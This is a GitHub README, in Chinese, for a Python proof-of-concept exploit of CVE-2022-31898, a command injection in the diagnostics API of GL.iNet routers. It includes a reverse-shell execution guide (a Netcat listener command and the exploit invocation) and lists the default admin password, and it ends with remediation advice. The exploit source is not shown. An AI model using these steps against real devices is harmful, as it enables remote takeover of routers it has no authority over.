CryptoGhost1/MangoPunch-CVE-2022-31898

GitHub: CryptoGhost1/MangoPunch-CVE-2022-31898

针对GL.iNet路由器CVE-2022-31898认证后命令注入漏洞的Python利用工具,可通过诊断API实现远程代码执行。

Stars: 0 | Forks: 0

# 🥭 MangoPunch: CVE-2022-31898 ### GL.iNet 设备的认证后 OS 命令注入 ![Python](https://img.shields.io/badge/Python-3.x-blue?style=for-the-badge&logo=python) ![CVE](https://img.shields.io/badge/CVE-2022--31898-red?style=for-the-badge) ![Security](https://img.shields.io/badge/Security-Research-green?style=for-the-badge) ``` __ __ _____ _ | \/ | | __ \ | | | \ / | __ _ _ __ __ _ ___ | |__) | _ _ __ ___| |__ | |\/| |/ _` | '_ \ / _` |/ _ \| ___/ | | | '_ \ / __| '_ \ | | | | (_| | | | | (_| | (_) | | | |_| | | | | (__| | | | |_| |_|\__,_|_| |_|\__, |\___/|_| \__,_|_| |_|\___|_| |_| __/ | |___/ ``` ## 🔍 漏洞概述 本仓库包含针对 **GL.iNet MT300N-V2 (Mango)** 及其他运行固件版本低于 **3.215** 的型号中发现的 **远程代码执行 (RCE)** 漏洞的技术概念验证 (PoC)。 该漏洞存在于诊断 API 的 `ping_addr` 参数中,允许经过认证的攻击者通过 shell 元字符 (`;`) 执行任意系统命令。 ## 🚀 执行指南 ### 1. 准备监听器 在攻击机 (Kali Linux) 上打开终端并启动 Netcat 监听器: ``` nc -lvnp 9292 ``` ### 2. 运行 Exploit 使用以下命令触发反向 shell: ``` python3 mangopunch.py -R -L -l -p ``` ## 🛠️ 脚本参数 | Flag | Full Name | Description | Default | | :--- | :--- | :--- | :--- | | `-R` | `--rhost` | 远程目标 IP (路由器) | `Required` | | `-P` | `--rport` | Web 管理端口 | `443` | | `-L` | `--lhost` | 监听器 IP (Kali/攻击者) | `Required` | | `-l` | `--lport` | 监听器端口 | `Required` | | `-p` | `--pwd` | 管理员密码 | `goodlife` | | `-t` | `--https` | 启用 HTTPS | `False` | ## 🛡️ 修复建议 * **更新固件**:确保您的设备运行的是 **3.215** 或更高版本。 * **输入验证**:开发人员应对 IP/主机名参数实施严格的 Regex 验证,并避免使用将原始字符串传递给 OS 的 shell 调用函数。
标签:CISA项目, CTF工具, CVE-2022-31898, GL.iNet, IoT安全, PoC, Python, RCE, Shell注入, 命令注入, 固件漏洞, 嵌入式设备, 无后门, 暴力破解, 漏洞复现, 漏洞搜索, 红队攻击, 编程工具, 网络安全, 认证后漏洞, 路由器安全, 远程代码执行, 逆向Shell, 隐私保护